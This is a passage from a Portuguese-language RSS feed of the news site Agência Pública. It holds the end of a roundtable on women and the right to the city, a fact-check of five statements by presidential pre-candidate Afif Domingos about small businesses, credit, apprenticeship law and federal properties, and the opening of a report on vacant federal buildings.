bem estabelecido que lida com essa diversidade. Existem hotéis públicos, abrigos públicos, modelos de praça-abrigo. Existem outras formas de você lidar com a população de rua que não o aprisionamento, que não a locomoção para outro município, que é uma prática fascista clássica do Rio de Janeiro especificamente. E São Paulo agora com o Dória, meus pêsames. Internação compulsória, criminalização automática, esterilização compulsória, incêndio, enfim. Existem práticas concretas, estabelecidas, e outras veladas, que são automaticamente inseridas nesse estado enlouquecido, fascista que a gente tem hoje. Acho que a gente precisa ampliar o debate, pegando o gancho também da população de rua, de como essas formas não estão visibilizadas porque nós não fazemos o debate do tema. Não existe lá grandes comoções quando mendigos são removidos, por exemplo. Pelo contrário, as pessoas ligam para que os seus mendigos, a população de rua seja removida dos bairros. Eles são alocados para outro bairro, para outra cidade. Precisa estabelecer também a discussão coletiva desse modelo do Estado, e aí pegando o gancho de quem falou de como esse Estado dialoga, como esse Estado atua, ou quais políticas públicas esse Estado deveria tomar. O Estado, gente, infelizmente é o reflexo de como a sociedade se estabelece e se comporta. Se temos uma sociedade racista, automaticamente esse Estado será racista. Se temos um Estado fascista e conservador, automaticamente esse Estado será fascista e conservador. Existe uma ocupação da elite burguesa escravagista, homofóbica e racista? Existe. Mas existe também o período curto, mas existente e democrático nesse país, e já vimos, estamos vendo que é através do voto, o pior da nossa sociedade foi catapultado para esse lugar da institucionalidade.</p><p><strong>Andrea Dip – Inclusive o Congresso mais conservador…</strong></p><p><strong>Tainá de Paula –</strong> … visto antes na história desse país. É importante a gente falar sobre isso porque se, de fato, existe a máquina econômica que gera quadros e faz com que esses quadros ocupem os espaços de representação, existe um não incômodo social sobre esses quadros. Ninguém sai pedindo a cassação do Bolsonaro, por exemplo. Nenhum petição pública, nenhuma comoção, no seio da sociedade, discutiu a atuação do Bolsonaro nos últimos quatro anos de Congresso. Ao contrário, ele tem um índice considerável de votantes e ainda não está em campanha eleitoral. É só a imagem dele que está sendo projetada e, infelizmente, as aberrações que ele fala. A gente precisa discutir com a sociedade, existe uma tarefa social a ser feita, e o conservadorismo está encontrando brechas e formas de se consolidar. No meu ativismo feminista eu acompanhei, no último ano, as aprovações dos planos municipais e estaduais de Educação, na rede feminista nacional. E saibam vocês que em 86% dos municípios que estruturam o estado do Brasil a palavra “gênero” foi retirada dos planos municipais de educação, inclusive nas casas legislativas do Rio de Janeiro. É importante a gente falar sobre isso. O plano municipal da cidade do Rio de Janeiro tem frases do tipo “gênero alimentício nas escolas”, e a frase ficou “alimentício nas escolas”, porque a assessoria da base legislativa conservadora sentou no computador, deu um “find”, “excluir” todo o conteúdo da palavra “gênero”. A gente precisa discutir no seio da nossa sociedade, nessa estrutura que a gente tem, o que está acontecendo. Porque isso só foi possível porque, de certa forma, a sociedade não discute gênero, então tudo bem tirar essa palavra’. Mas é essa palavra que gera e possibilita a discussão de violência sexual, a discussão de violência de gênero, a discussão da violência doméstica, a discussão das assimetrias de gênero e todas as identidades. Ou eu não posso falar sobre identidade nas escolas? Não, não posso. E acho que só através de um acesso ao sistema de educação e ao sistema de formação cultural para esse país é que a gente vai conseguir, na base estrutural, conseguir fazer essas modificações. Eu não sei como uma rede educacional que está construída dessa forma, atrelada a uma PEC do Teto que congela durante 20 anos investimento em saúde e educação vai construir as mentes pensantes desse país. Eu tenho muito medo.</p><p><strong>Andrea Dip – Isso sem nem entrar nos projetos de Escola Sem Partido.</strong></p><p><strong>Iazana Guizzo –</strong> Sem nem entrar no Ensino Superior também.</p><p><strong>Tainá de Paula –</strong> Sim. Então, eu acho que o caso é grave. A gente pode até ter uma onda feminista que a gente tem que surfar horrores nessa onda e transformá-la em um maremoto, mas o ataque ao modelo contrário, o backlash disso é enorme, e a gente está longe de se organizar como, por exemplo, as argentinas se organizaram nesta semana. Dois milhões de mulheres na rua em um frio de cinco graus.</p><p><strong>Andrea Dip – Passaram a noite.</strong></p><p><strong>Tainá de Paula –</strong> Sim, 24 horas. Isso é estrutura social, mobilização social, e muita discussão coletiva sobre os temas. Acho que essas microrrevoluções só acontecem com grandes mobilizações sociais.</p><p><iframe width="500" height="281" src="https://www.youtube.com/embed/TlzROTM5-4M?feature=oembed" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe></p> ]]></content:encoded> <wfw:commentRss>https://apublica.org/2018/06/mulheres-e-o-direito-a-cidade/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Afif usa dado falso e número sem contexto sobre empresas</title><link>https://apublica.org/2018/06/truco-afif-usa-dado-falso-e-numero-sem-contexto-sobre-empresas/</link> <comments>https://apublica.org/2018/06/truco-afif-usa-dado-falso-e-numero-sem-contexto-sobre-empresas/#respond</comments> <pubDate>Thu, 21 Jun 2018 15:29:41 +0000</pubDate> <dc:creator><![CDATA[Ethel Rudnitzki]]></dc:creator> <category><![CDATA[Português]]></category> <category><![CDATA[checagem]]></category> <category><![CDATA[fact-checking]]></category> <category><![CDATA[PSD]]></category> <category><![CDATA[trabalho infantil]]></category> <category><![CDATA[Truco]]></category> <category><![CDATA[Truco Eleições 2018]]></category><guid isPermaLink="false">http://apublica.org/?post_type=claim_review&p=47966</guid> <description><![CDATA[Ex-presidente do Sebrae também erra número de imóveis da União com particulares e acerta falta de lei de aprendizado para micro e pequenas empresas
]]></description> <content:encoded><![CDATA[<figure id="attachment_47965" aria-describedby="figcaption_attachment_47965" class="wp-caption aligncenter" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>Antônio Cruz/Agência Brasil</div><img itemprop="contentURL" class="wp-image-47965 size-full" src="https://apublica.org/wp-content/uploads/2018/06/16501048262_505caa297f_z.jpg" alt="" width="640" height="449" /></div><figcaption id="figcaption_attachment_47965" class="wp-caption-text caption" itemprop="description">Vice-governador do estado de São Paulo de 2011 a 2014, Afif defende a valorização de micro e pequenas empresas</figcaption></figure><p><span style="font-weight: 400">Guilherme Afif Domingos (PSD) licenciou-se da presidência do Serviço Brasileiro de Apoio às Micro e Pequenas Empresas (Sebrae),</span><a href="https://g1.globo.com/politica/noticia/afif-domingos-anuncia-licenca-do-sebrae-para-tentar-ser-candidato-do-psd-a-presidencia-da-republica.ghtml" target="_blank" rel="noopener"> <span style="font-weight: 400">em 6 de junho, para concorrer ao Palácio do Planalto</span></a><span style="font-weight: 400">. Sua nomeação ainda precisa ser aprovada na convenção do partido. Não é a primeira vez que Afif concorre à Presidência. Em 1989, foi candidato pelo PL (que virou PR, depois de se fundir com o PRONA), legenda que ajudou a fundar em 1985 e pela qual se elegeu deputado constituinte, em 1986. Antes disso, o presidenciável havia passado pelo PDS, de 1981 a 1985. Em 1990, migrou para o PFL (atual DEM), onde ficou até 2011, quando participou da fundação do PSD.</span></p><p><span style="font-weight: 400">Foi vice-governador de São Paulo na chapa de Geraldo Alckmin (PSDB), de 2011 a 2014. Entre 2013 e 2015, ocupou o cargo de ministro-chefe da Secretaria da Micro e Pequena Empresa no governo Dilma Rousseff (PT). Durante toda sua carreira, defendeu os micro e pequenos empresários, levantando bandeiras como a diminuição de impostos e da burocracia e a distribuição de incentivos fiscais.</span></p><p><span style="font-weight: 400">Como pré-candidato, Afif participou de um </span><a href="https://www.youtube.com/watch?v=UModZQr9E00&t=2s" target="_blank" rel="noopener"><span style="font-weight: 400">debate promovido pela Confederação Nacional de Municípios no dia 23 de maio</span></a><span style="font-weight: 400">. O</span><a href="https://apublica.org/checagem/" target="_blank" rel="noopener"> <b>Truco</b></a><span style="font-weight: 400"> – projeto de fact-checking da</span><a href="https://apublica.org/" target="_blank" rel="noopener"> <b>Agência Pública</b></a><span style="font-weight: 400">, que</span><a href="https://apublica.org/tag/truco-eleicoes-2018/" target="_blank" rel="noopener"> <span style="font-weight: 400">vem analisando o discurso dos presidenciáveis</span></a><span style="font-weight: 400"> – verificou cinco de suas falas na ocasião. A assessoria de imprensa do pré-candidato foi questionada sobre as fontes das informações usadas e respondeu dentro do prazo estabelecido. Afif é o 14º presidenciável checado pelo </span><b>Truco</b><span style="font-weight: 400">.</span></p><p><b>Leia mais:</b></p><p><a href="https://apublica.org/2018/06/truco-rodrigo-maia-usa-dados-sem-contexto-sobre-educacao/" target="_blank" rel="noopener"><b>Rodrigo Maia usa dados sem contexto sobre educação</b></a></p><p><a href="https://apublica.org/2018/06/truco-aldo-rebelo-usa-dados-falsos-sobre-golpe-de-64-copa-e-amazonia/" target="_blank" rel="noopener"><b>Aldo Rebelo usa dados falsos sobre golpe de 64, Copa e Amazônia</b></a></p><p><a href="https://apublica.org/2018/05/truco-manuela-davila-erra-dados-sobre-seguranca-publica/" target="_blank" rel="noopener"><b>Manuela D’Ávila erra dados sobre segurança pública</b></a></p><p> </p><hr /><p><b><a id="frase1"></a>“Se tiver 200 a 300 municípios no Brasil que tenham médias e grandes empresas é muito. Mas em todos os municípios brasileiros estão lá as micro e pequenas empresas.”</b></p><p><span style="font-weight: 400"><img class="size-full wp-image-30306 alignleft" src="https://apublica.org/wp-content/uploads/2017/05/falso-400.jpg" alt="Falso" width="400" height="400" />Afif subestimou a quantidade de municípios brasileiros que possuem grandes e médias empresas e ainda superestimou a quantidade dos que contam com pequenas empresas. As grandes empresas estão presentes em 1.721 municípios (30% do total), as médias em 3.847 e 1.655 municípios possuem empresas grandes e médias ao mesmo tempo. Além disso, existem 108 municípios que não possuem empresas de pequeno porte. Somente as microempresas estão presentes em todos. Portanto, é incorreto dizer que as micro e pequenas empresas estão em todos os municípios brasileiros, como alega Afif. A frase é falsa. </span></p><p><span style="font-weight: 400">De acordo com o</span><a href="http://www.planalto.gov.br/ccivil_03/Leis/lcp/lcp123.htm" target="_blank" rel="noopener"> <span style="font-weight: 400">Estatuto Nacional da Microempresa e da Empresa de Pequeno Porte</span></a><span style="font-weight: 400"> (Lei Complementar nº 123/2006), são consideradas microempresas aquelas com receita bruta até R$ 360 mil. Entre R$ 360 mil e R$ 4,8 milhões, são empresas de pequeno porte. Acima de R$ 4,8 milhões, são classificadas como empresas de médio e grande porte. Para o Banco Nacional de Desenvolvimento Econômico e Social (BNDES),</span><a href="https://www.bndes.gov.br/wps/portal/site/home/financiamento/guia/quem-pode-ser-cliente/" target="_blank" rel="noopener"> <span style="font-weight: 400">as médias empresas são aquelas com receita bruta anual maior que R$ 4,8 milhões e menor ou igual a R$ 300 milhões, e as grandes têm o faturamento anual maior que R$ 300 milhões</span></a><span style="font-weight: 400">.</span></p><p><span style="font-weight: 400">O DataSebrae é o único órgão que possui dados da distribuição de empresas por porte nos municípios, levando em conta o faturamento anual. Diferentemente do que diz a lei federal, o órgão</span><a href="http://datasebrae.com.br/o-datasebrae/perguntas-frequentes/" target="_blank" rel="noopener"> <span style="font-weight: 400">considera como empresas de pequeno porte aquelas com até R$ 3,6 milhões de faturamento anual</span></a><span style="font-weight: 400">. O IBGE só possui dados de empresas segundo seu número de funcionários e não as classifica quanto ao porte.</span><!-- alsoRead --></p><p><span style="font-weight: 400">O</span><a href="https://cidades.ibge.gov.br/brasil/panorama" target="_blank" rel="noopener"> <span style="font-weight: 400">Brasil possui 5.570 municípios</span></a><span style="font-weight: 400">, segundo dados do IBGE. Desses, de acordo com o</span><a href="http://sistema.datasebrae.com.br/sites/novo_datasebrae/#Empresas_Total-de-empresas_Mapa" target="_blank" rel="noopener"> <span style="font-weight: 400">DataSebrae</span></a><span style="font-weight: 400">, 3.913 possuem médias ou grandes empresas – número bastante superior ao citado por Afif. As grandes empresas estão presentes em 1.721 municípios e as médias, em 3.847. Já os municípios que abrigam, ao mesmo tempo, empresas médias e grandes, são 1.655. Os dados foram calculados a partir do levantamento do Sebrae de 2014, último disponível.</span></p><p><span style="font-weight: 400">No que diz respeito às micro e pequenas empresas, as primeiras realmente estão presentes em todos os municípios, segundo o órgão. No entanto, as pequenas, com faturamento entre R$ 360 mil e R$ 4,8 milhões, estão em apenas 5.462 deles – em 108 municípios brasileiros não há pequenas empresas.</span></p><p><span style="font-weight: 400">Questionada, a assessoria de imprensa do pré-candidato argumentou que com a frase, Afif quis “ilustrar a extrema concentração econômica brasileira”, não dizer literalmente que apenas entre 200 e 300 municípios possuem médias e grandes empresas concomitantemente. Para isso, eles utilizam dados do IBGE que dizem que</span><a href="https://agenciadenoticias.ibge.gov.br/agencia-noticias/2013-agencia-de-noticias/releases/18785-pib-dos-municipios-2015-capitais-perdem-participacao-no-pib-do-pais.html" target="_blank" rel="noopener"> <span style="font-weight: 400">25 municípios concentram 37,7% de participação no PIB</span></a><span style="font-weight: 400">. Os outros 5.545 repartem os 62,3% restantes.</span></p><p><span style="font-weight: 400">A assessoria também citou dados do Anuário do Trabalho nos Pequenos Negócios 2016, realizado pelo Sebrae em parceria com o Dieese. O documento determina o porte de empresas a partir do número de funcionários e utiliza dados do IBGE para determinar a quantidade de empresas. Conclui que os municípios com mais de 100 mil habitantes concentram 80,8% das grandes e médias empresas. Ou seja, ainda sobra 19,2% de empresas deste porte espalhadas por outros municípios.</span></p><p>Ao ser informada da classificação da checagem, a equipe de Afif destacou que o primeiro trecho não seria propriamente uma afirmação por conta do uso da expressão “se tiver” e que a frase abordava a desigualdade econômica brasileira. “Salientando que em 316 municípios (acima de 100 mil habitantes) temos 80,8% da médias e grandes empresas segundo o Anuário do Trabalho nos Pequenos Negócios 2016 (Sebrae – Dieese; 2017)”, afirma.</p><p><b><a id="frase2"></a>“O crédito não chega: 84% das micro e pequenas empresas não veem a cor do crédito.”</b></p><p><span style="font-weight: 400"><img class="size-full wp-image-30745 alignleft" src="https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400.jpg" alt="Sem contexto" width="400" height="400" srcset="https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400.jpg 400w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-150x150.jpg 150w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-300x300.jpg 300w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-240x240.jpg 240w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-32x32.jpg 32w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-50x50.jpg 50w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-64x64.jpg 64w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-96x96.jpg 96w, https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400-128x128.jpg 128w" sizes="(max-width: 400px) 100vw, 400px" />A afirmação do pré-candidato traz um dado verdadeiro, mas falta contexto indispensável à compreensão do tema. É verdade que 84% das micro e pequenas empresas não viram “a cor do crédito” no ano passado, como alega Afif. No entanto, isso ocorreu porque essas empresas não tentaram conseguir empréstimos – apenas 16% das empresas desse porte tentaram obter crédito. Além disso, faltou dizer que o número só vale para os empréstimos concedidos em 2017. A mesma pesquisa mostra que 51% das empresas de micro ou pequeno porte já utilizaram linhas de crédito antes, ou seja, já obtiveram empréstimos anteriormente. Por isso, a afirmação foi considerada sem contexto.</span></p><p><span style="font-weight: 400">A fonte do dado citado por Afif é o estudo</span><a href="http://datasebrae.com.br/wp-content/uploads/2017/09/Relat%C3%B3rio-Especial-O-Financiamento-das-MPE-no-Brasil-2017_FINAL.pdf" target="_blank" rel="noopener"> <span style="font-weight: 400">O Financiamento das Micro e Pequenas Empresas no Brasil</span></a><span style="font-weight: 400">, realizado pelo Sebrae em 2017. A pesquisa mostra que 84% das micro e pequenas empresas não pegaram empréstimos em 2017. Segundo o estudo, isso aconteceu porque elas não tentaram, não porque o crédito foi negado. Dentro do grupo que não tentou, 39% disseram não precisar de empréstimo, 16% não gostam de empréstimo, 15% não confiam na política econômica, 11% não conseguiriam pagar e 6% não gostam de pagar juros altos. Portanto, as principais razões das micro e pequenas empresas não solicitarem crédito, no ano de 2017, foram a falta de interesse ou de necessidade.</span></p><p><span style="font-weight: 400">Além disso, somente 49% dos micro e pequenos empresários afirmam nunca ter solicitado crédito pela empresa e 51% já o fizeram, segundo a mesma pesquisa do Sebrae. Desses últimos, apenas 16% deles já tiveram o pedido de crédito negado alguma vez. Entre 2013 e 2017, 36% das micro e pequenas empresas tomou ou manteve empréstimo em algum momento.</span></p><p><span style="font-weight: 400">Outra</span><a href="https://www.spcbrasil.org.br/pesquisas/pesquisa/2826" target="_blank" rel="noopener"> <span style="font-weight: 400">pesquisa, realizada pelo Serviço de Proteção ao Crédito (SPC) em junho de 2017, reforça a falta de interesse dos micro e pequenos empresários em contratar crédito</span></a><span style="font-weight: 400">. O estudo foi feito com base no Indicador de Demanda por Crédito do Micro e Pequeno Empresário de Varejo e Serviços, que leva em conta 800 empreendimentos com até 49 funcionários nas 27 unidades da Federação, e mostrou recuo na demanda por crédito – 85% das micro e pequenas empresas disseram não querer empréstimos nos três meses seguintes à pesquisa. Apenas 6% delas declararam interesse. Entre as que não tinham interesse, 39% disseram conseguir se manter com recursos próprios e 28% justificaram a decisão devido às altas taxas de juros. No que diz respeito às dificuldades de conseguir empréstimos, o estudo do SPC diz que 37% dos empresários consideram contratar crédito algo difícil.</span></p><p><span style="font-weight: 400">Procurada pelo </span><b>Truco</b><span style="font-weight: 400">, a equipe do pré-candidato confirmou que a fonte do dado é o relatório O Financiamento das Micro e Pequenas Empresas no Brasil, mas destacou outro dado da pesquisa, que fala sobre a percepção de dificuldade do crédito, e não sobre a utilização de crédito. “Só 16% dos pequenos negócios tentaram empréstimos novos nesse ano e a maioria (82%) enfrentou dificuldades para sua obtenção, sendo os juros altos (48%) e a falta de garantias (20%) as principais. Disso resulta a citação de que 84% não tem acesso”, explicou a assessoria. No entanto, alegar dificuldades de obter crédito não quer dizer que as solicitantes tiveram os empréstimos negados, como mostram números da própria pesquisa.</span></p><p>A assessoria de imprensa do pré-candidato disse, depois de atribuído o selo à frase, que o contexto da fala foi em relação à burocracia que as pequenas empresas têm que superar para conseguir os empréstimos. “Muitas não tentaram conseguir empréstimos porque muitas delas nem possuem quadros técnicos para superar essa burocracia. Portanto, a fala foi em relação a importância da desburocratização”, diz.</p><p><b><a id="frase3"></a>“Na Constituinte nós colocamos que é proibido todo e qualquer trabalho de menores de 14 anos. Aí a turma resolveu e mudou, não é 14, é proibido todo e qualquer trabalho para menores de 16 anos, com exceção do aprendiz a partir dos 14 anos. E fizeram uma lei de aprendizado só para as grandes empresas, que representam 2% do universo das empresas. E nós esquecemos de fazer uma lei de aprendizado para 98% das empresas, que são as micro e pequenas empresas.”</b></p><p><span style="font-weight: 400"><img class="size-full wp-image-30361 alignleft" src="https://apublica.org/wp-content/uploads/2017/05/verdadeiro-400.jpg" alt="Verdadeiro" width="400" height="400" />Não existe uma lei de aprendizagem específica para as micro e pequenas empresas no Brasil. A afirmação de Afif é verdadeira. A assessoria de imprensa do presidenciável informou que retirou as informações da Constituição Federal, do Manual da Aprendizagem de 2009 do Ministério do Trabalho e do Boletim do Sebrae de dezembro de 2017.</span></p><p><span style="font-weight: 400">No artigo 121 da</span><a href="http://www.planalto.gov.br/ccivil_03/constituicao/constituicao34.htm" target="_blank" rel="noopener"> <span style="font-weight: 400">Constituição Federal de 1934</span></a><span style="font-weight: 400"> foi proibido o trabalho para menores de 14 anos, o trabalho noturno foi permitido para maiores de 16 anos e o emprego em indústrias insalubres foi negado para menores de 18 anos e mulheres. Na</span><a href="http://www.planalto.gov.br/ccivil_03/constituicao/constituicao67.htm" target="_blank" rel="noopener"> <span style="font-weight: 400">Constituição de 1967</span></a><span style="font-weight: 400">, a idade mínima diminuiu para 12 anos. Na Constituição Federal de 1988, voltou a restrição a menores de 14 anos, e uma emenda constitucional de 1998 elevou a faixa etária para 16 anos. Ou seja, atualmente,</span><a href="http://www.planalto.gov.br/ccivil_03/Decreto-Lei/Del5452.htm#art403." target="_blank" rel="noopener"> <span style="font-weight: 400">é</span> <span style="font-weight: 400">negado qualquer emprego a menores de 16 anos de idade, exceto na condição de aprendiz, a partir dos 14 anos</span></a><span style="font-weight: 400">, de acordo com o artigo 403 da Consolidação das Leis do Trabalho (CLT).</span></p><p><span style="font-weight: 400">O Estatuto da Criança e do Adolescente (ECA) e a CLT regulamentam as condições e os direitos dos jovens e das empresas contratantes. De acordo com o artigo</span><a href="http://www.planalto.gov.br/ccivil_03/Decreto-Lei/Del5452.htm#art429." target="_blank" rel="noopener"> <span style="font-weight: 400">429 da CLT</span></a><span style="font-weight: 400">, os estabelecimentos de qualquer natureza, que tenham pelo menos 7 empregados, são obrigados a empregar o número de aprendizes equivalente a partir de 5% a 15% dos trabalhadores existentes em cada estabelecimento, cujas funções demandem formação profissional.</span></p><p><span style="font-weight: 400">Contudo,</span><a href="http://www.planalto.gov.br/ccivil_03/_ato2004-2006/2005/decreto/d5598.htm" target="_blank" rel="noopener"> <span style="font-weight: 400">é facultativa a contratação de aprendizes pelas microempresas, empresas de pequeno porte</span></a><span style="font-weight: 400"> (inclusive as que integram o Sistema Integrado de Pagamento de Impostos e Contribuições, denominado como “Simples”) e entidades sem fins lucrativos que tenham por objetivo a educação profissional. E, quando ocorrer a contratação por parte delas, deverão seguir as mesmas leis de aprendizagem que as outras empresas – com exceção da obrigação de matricular seus aprendizes nos cursos dos Serviços Nacionais de Aprendizagem, segundo o</span><a href="http://bd.camara.gov.br/bd/bitstream/handle/bdcamara/783/estatuto_microempresa_3ed.pdf?sequence=1" target="_blank" rel="noopener"> <span style="font-weight: 400">Estatuto Nacional da Microempresa e da Empresa de Pequeno Porte</span></a><span style="font-weight: 400">.</span></p><p><span style="font-weight: 400">Quanto ao total de pequenos negócios no Brasil, a assessoria de imprensa de Afif encaminhou o Boletim do Sebrae de dezembro de 2017, que constata que, em 2015,</span><a href="https://m.sebrae.com.br/Sebrae/Portal%20Sebrae/Anexos/7836.pdf" target="_blank" rel="noopener"> <span style="font-weight: 400">98,5% das empresas privadas no país eram de pequeno porte (EPP), microempresas (ME) e de microempreendedores individuais (MEI),</span></a><span style="font-weight: 400"> mas não especifica a porcentagem para as de médio e grande porte. O documento O Público do Sebrae, publicado em junho do ano passado – que procura detalhar o perfil dos empreendedores de pequenos negócios no país –</span><a href="http://datasebrae.com.br/documentos2/Ws567dR/Documentos%20de%20Refer%C3%AAncia/O%20publico%20do%20Sebrae%20ed%206.pdf" target="_blank" rel="noopener"> <span style="font-weight: 400">revela que em 2016, existiam cerca de 12 milhões de empresas no Brasil</span></a><span style="font-weight: 400">. Desse total, 98,5% são pequenos negócios (MEI, EPP, ME) e 180 mil (1,5%), empresas de grande e médio porte.</span></p><p><b><a id="frase4"></a>“Existem 508 mil imóveis da União em mãos particulares.”</b></p><p><span style="font-weight: 400"><img class="size-full wp-image-30306 alignleft" src="https://apublica.org/wp-content/uploads/2017/05/falso-400.jpg" alt="Falso" width="400" height="400" />Durante o debate promovido pela Confederação Nacional de Municípios, Afif também falou sobre os imóveis da União concedidos a particulares e os de utilização pública. Apesar de ter comentado os dois casos em uma única frase, o </span><b>Truco</b><span style="font-weight: 400"> dividiu a afirmação em duas partes porque os selos atribuídos a cada trecho são distintos. O número usado pelo pré-candidato sobre imóveis do governo federal em mãos de particulares é antigo. Hoje, há 632.556 imóveis da União em uso dominial, que são imóveis públicos em uso por particulares. A frase é, portanto, falsa.</span></p><p><span style="font-weight: 400">Procurada pelo </span><b>Truco</b><span style="font-weight: 400">, a assessoria de imprensa de Afif alega que a fonte do dado é uma</span><a href="http://www.planejamento.gov.br/servicos/faq/patrimonio-da-uniao/visao-geral/quantos-imoveis-tem-a-uniao" target="_blank" rel="noopener"> <span style="font-weight: 400">página do Ministério do Planejamento, Desenvolvimento e Gestão</span></a><span style="font-weight: 400">. No link enviado o ministério faz um balanço de quantos imóveis a União tem. “A União possui 30.993 imóveis de uso especial […] e 508.629 imóveis de uso dominial”, atesta o ministério. O dado, extraído dos sistemas SIAPA e SPIUnet, é referente ao ano de 2011.</span></p><p><span style="font-weight: 400">O número utilizado por Afif e contido no link, contudo, está bastante desatualizado. Os</span><a href="https://arquivos.spu.planejamento.gov.br/owncloud/index.php/s/Rmh0oYD5Qsfk1E3" target="_blank" rel="noopener"> <span style="font-weight: 400">arquivos da Secretaria de Patrimônio da União (SPU)</span></a><span style="font-weight: 400">, vinculada ao Ministério do Planejamento, mostram que na verdade já são mais 600 mil os imóveis da União em uso por particulares. Os dados da planilha são de maio de 2018.</span></p><p><span style="font-weight: 400">Os</span><a href="http://www.planejamento.gov.br/assuntos/gestao/patrimonio-da-uniao/bens-da-uniao" target="_blank" rel="noopener"> <span style="font-weight: 400">imóveis de uso dominial</span></a><span style="font-weight: 400">, quando utilizados por particulares, exigem o pagamento de uma retribuição pela utilização privada de um bem público. Assim, os recursos gerados dessa forma são conhecidos como receitas patrimoniais. No entanto, as taxas cobradas mensalmente pela concessão desses imóveis variam enormemente e podem ser de apenas 0,6% do valor avaliado do imóvel.</span></p><p>Comunicada do resultado da apuração, a assessoria de imprensa de Afif admitiu que o número usado é antigo. “O contexto da fala foi em relação a dificuldade dos municípios realizarem PPPs devido à capacidade de garantia.<br /> O que foi proposto é a criação de um fundo da União que garantisse aos investidores a parceria. E a proposta foi criar um fundo com garantia dos imóveis da União. Quanto mais imóveis, mais garantia e mais municípios serão atendidos. O número é antigo (2011), mas não é falso, e está no site do Ministério do Planejamento. Se hoje há mais de 500 mil quer dizer que a proposta se torna mais viável ainda, atendendo mais municípios.”</p><p><b><a id="frase5"></a>“[Existem] mais 38 mil [imóveis da União] de utilização pública.”</b></p><p><span style="font-weight: 400"><img class="size-full wp-image-30361 alignleft" src="https://apublica.org/wp-content/uploads/2017/05/verdadeiro-400.jpg" alt="Verdadeiro" width="400" height="400" />No segundo trecho da frase em que aborda o número de imóveis da União, Afif aponta que são mais de 38 mil os imóveis de utilização pública, ou seja, os que estão em uso para o serviço público. O número corresponde ao indicado pela SPU em maio de 2018. Por isso, a frase é verdadeira.</span></p><p><span style="font-weight: 400">Quando procurado pelo </span><b>Truco,</b><span style="font-weight: 400"> o pré-candidato apontou como fonte do dado um link com números desatualizados, diferentes do que ele indicou em seu pronunciamento. No</span><a href="http://www.planejamento.gov.br/servicos/faq/patrimonio-da-uniao/visao-geral/quantos-imoveis-tem-a-uniao" target="_blank" rel="noopener"> <span style="font-weight: 400">link enviado à reportagem</span></a><span style="font-weight: 400">, consta que a União possui 30.993 imóveis de utilização pública. Na planilha mais atual, de maio de 2015, são 38.435 imóveis. O número mais recente corresponde ao apontado pelo pré-candidato no debate, quando ele falou em “mais de 38 mil” imóveis classificados como “uso especial”.</span></p><p><span style="font-weight: 400">Os</span><a href="http://www.planejamento.gov.br/assuntos/gestao/patrimonio-da-uniao/bens-da-uniao" target="_blank" rel="noopener"> <span style="font-weight: 400">imóveis da União de uso especial</span></a><span style="font-weight: 400"> são aqueles que se destinam à execução de serviços administrativos ou à prestação de serviços públicos em geral, como prédios de repartições públicas, escolas, hospitais ou outros equipamentos públicos, sejam eles de administração federal, estadual ou municipal.</span></p><h3>Veja outras checagens dos presidenciáveis</h3><div id="freewall-1530382049-6794" class="freewall summaries mt-5 mb-5"><div class="brick card brick-category-1"> <a href='https://apublica.org/2018/05/truco-marina-silva-omite-processos-mas-acerta-sobre-meio-ambiente/'><img width="800" height="600" src="https://apublica.org/wp-content/uploads/2018/05/1014211-18042016-img_0119-1-800x600.jpg" class="card-img-top mb-2 wp-post-image" alt="" /></a><div class="card-body"><p class="card-text summary"><a href='https://apublica.org/2018/05/truco-marina-silva-omite-processos-mas-acerta-sobre-meio-ambiente/'>Marina Silva omite processos, mas acerta sobre meio ambiente</a></p></div></div><div class="brick card brick-category-1"> <a href='https://apublica.org/2018/04/truco-ao-falar-do-brasil-ciro-gomes-usa-dados-falsos-e-exagerados/'><img width="800" height="600" src="https://apublica.org/wp-content/uploads/2018/04/ciro-gomes-palestra-800x600.jpg" class="card-img-top mb-2 wp-post-image" alt="Ciro Gomes em palestra na UFABC, em 2017; no exterior, candidato citou dados falsos" /></a><div class="card-body"><p class="card-text summary"><a href='https://apublica.org/2018/04/truco-ao-falar-do-brasil-ciro-gomes-usa-dados-falsos-e-exagerados/'>Ao falar do Brasil, Ciro Gomes usa dados falsos e exagerados</a></p></div></div><div class="brick card brick-category-1"> <a href='https://apublica.org/2018/03/truco-em-8-frases-acertos-e-erros-de-geraldo-alckmin/'><img width="800" height="600" src="https://apublica.org/wp-content/uploads/2018/03/geraldo-alckmin-800x600.jpg" class="card-img-top mb-2 wp-post-image" alt="" srcset="https://apublica.org/wp-content/uploads/2018/03/geraldo-alckmin-800x600.jpg 800w, https://apublica.org/wp-content/uploads/2018/03/geraldo-alckmin-510x382.jpg 510w" sizes="(max-width: 800px) 100vw, 800px" /></a><div class="card-body"><p class="card-text summary"><a href='https://apublica.org/2018/03/truco-em-8-frases-acertos-e-erros-de-geraldo-alckmin/'>Em 8 frases, acertos e erros de Geraldo Alckmin</a></p></div></div></div> ]]></content:encoded> <wfw:commentRss>https://apublica.org/2018/06/truco-afif-usa-dado-falso-e-numero-sem-contexto-sobre-empresas/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Milhares de imóveis da União estão vagos para uso</title><link>https://apublica.org/2018/06/milhares-de-imoveis-da-uniao-estao-vagos-para-uso/</link> <comments>https://apublica.org/2018/06/milhares-de-imoveis-da-uniao-estao-vagos-para-uso/#respond</comments> <pubDate>Thu, 21 Jun 2018 15:21:18 +0000</pubDate> <dc:creator><![CDATA[Bruno Fonseca]]></dc:creator> <category><![CDATA[Português]]></category> <category><![CDATA[imóveis]]></category> <category><![CDATA[moradia]]></category> <category><![CDATA[ocupação]]></category> <category><![CDATA[SPU]]></category><guid isPermaLink="false">http://apublica.org/?p=47983</guid> <description><![CDATA[Parte dos mais de 10 mil imóveis vazios em todo o país poderia ser destinada à habitação popular]]></description> <content:encoded><![CDATA[<p>No centro do Rio de Janeiro, a dois quarteirões 